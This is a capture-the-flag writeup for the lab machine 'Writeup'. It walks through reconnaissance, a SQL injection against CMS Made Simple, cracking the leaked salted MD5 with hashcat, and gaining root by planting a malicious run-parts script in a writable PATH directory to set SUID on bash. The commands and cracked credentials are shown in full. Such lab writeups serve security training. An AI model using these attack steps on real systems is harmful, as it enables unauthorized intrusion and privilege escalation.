Writeup

, , , , , , , ,

Tools

  • whatweb
  • ffuf
  • pspy
  • hashcat

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ sudo nmap -sC -sV -p22,80 10.129.116.95         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-08 18:46 EST
Nmap scan report for 10.129.116.95
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Nothing here yet.
| http-robots.txt: 1 disallowed entry 
|_/writeup/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.64 seconds

Foothold

nmap scan didn’t tell me much

going to use whatweb to get more information

1
2
$ whatweb 10.129.116.95
http://10.129.116.95 [200 OK] Apache[2.4.25], Country[RESERVED][ZZ], Email[jkr@writeup.htb], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.129.116.95], Title[Nothing here yet.]

from Email[jkr@writeup.htb], i get the domain
i’m going to add it to my hosts file

1
2
$ echo '10.129.116.95 writeup.htb' | sudo tee -a /etc/hosts           
10.129.116.95 writeup.htb

the website is just a landing page with some text saying the site is DoS protected
there’s nothing on there or the page source

our nmap scan found /writeup/ directory
it’s a ctf writeup blog
going to use whatweb on the directory to get more info

1
2
$ whatweb http://writeup.htb/writeup/
http://writeup.htb/writeup/ [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.129.116.95], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]

after searching, i found that CMS Made Simple versions <= 2.2.9 are vulnerable to unauthenticated SQL injection
i used this PoC but modified it first. i changed the value of TIME to 5 so the requests don’t get blocked by the DoS protection
i was able to get the following user credentials

1
2
3
4
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

i’m going to add the hashed_password:salt to a file

1
$ echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash.txt

then crack it with hashcat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ hashcat -m 20 -a 0 hash.txt /usr/share/wordlists/rockyou.txt           


62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807
Time.Started.....: Sun Feb  8 20:34:16 2026 (3 secs)
Time.Estimated...: Sun Feb  8 20:34:19 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1767.2 kH/s (0.06ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4360192/14344385 (30.40%)
Rejected.........: 0/4360192 (0.00%)
Restore.Point....: 4359168/14344385 (30.39%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: raymie0506 -> raygan96
Hardware.Mon.#1..: Util: 52%

Started: Sun Feb  8 20:34:07 2026
Stopped: Sun Feb  8 20:34:20 2026

i can now ssh with this these credentials jkr:raykayjay9 and get the user flag

Privilege Escalation

i found that jkr is in staff group

1
2
3
$ id || (whoami && groups) 2>/dev/null
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

and the staff group has write and execute permissions on /usr/local/bin 

1
2
$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
1
2
3
4
5
6
7
8
9
10
$ $ ls -ld /usr/local/*
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin
drwxrwsr-x 2 root staff  4096 Apr 19  2019 /usr/local/etc
drwxrwsr-x 2 root staff  4096 Apr 19  2019 /usr/local/games
drwxrwsr-x 2 root staff  4096 Apr 19  2019 /usr/local/include
drwxrwsr-x 4 root staff  4096 Apr 24  2019 /usr/local/lib
lrwxrwxrwx 1 root staff     9 Apr 19  2019 /usr/local/man -> share/man
drwx-wsr-x 2 root staff 12288 Apr 19  2019 /usr/local/sbin
drwxrwsr-x 8 root staff  4096 Aug  6  2021 /usr/local/share
drwxrwsr-x 2 root staff  4096 Feb  8 20:48 /usr/local/src

which means i can escalate my privileges via binary hijacking

i uploaded pspy3 to the victim’s machine

1
2
wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy32
scp pspy32 jkr@10.10.10.138:/tmp

then ran the tool on one shell and in another shell, i ssh into the machine

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
jkr@writeup:~$ cd /tmp 
jkr@writeup:/tmp/$ chmod +x pspy32 
jkr@writeup:/tmp/$ ./pspy32

--SNIP--
2026/02/08 23:06:12 CMD: UID=0     PID=9204   | sshd: [accepted] 
2026/02/08 23:06:12 CMD: UID=0     PID=9205   | sshd: [accepted]  
2026/02/08 23:07:01 CMD: UID=0     PID=9206   | /usr/sbin/CRON 
2026/02/08 23:07:01 CMD: UID=0     PID=9207   | /usr/sbin/CRON 
2026/02/08 23:07:01 CMD: UID=0     PID=9208   | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1 
2026/02/08 23:07:14 CMD: UID=0     PID=9209   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new                              
2026/02/08 23:07:14 CMD: UID=0     PID=9210   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new                              
2026/02/08 23:07:14 CMD: UID=0     PID=9211   | run-parts --lsbsysinit /etc/update-motd.d 
2026/02/08 23:07:14 CMD: UID=0     PID=9212   | uname -rnsom 
2026/02/08 23:07:14 CMD: UID=0     PID=9213   | sshd: jkr [priv]  
--SNIP--

when we ssh into the machine, root launches a new shell with sh to run /usr/bin/env -i which runs a command with a modified environment. the -i start with an empty environment, then rebuilds PATH with /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin. run-parts then executes executes /update-motd.d

so, with that, i can create a malicious run-parts file in /usr/local/bin, which will be executed when i ssh into the machine

I create an executable payload that will set the SUID bit on /bin/bash binary

1
2
$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
$ chmod +x /usr/local/bin/run-parts

now, all i have to do is ssh into the machine, and the payload will trigger and set the bash binary into a SUID binary and run with -p flag to get root

1
2
3
4
5
6
7
8
$ ssh jkr@writeup.htb

-bash-4.4$ whoami
jkr
-bash-4.4$ /bin/bash -p
bash-4.4# whoami
root
bash-4.4#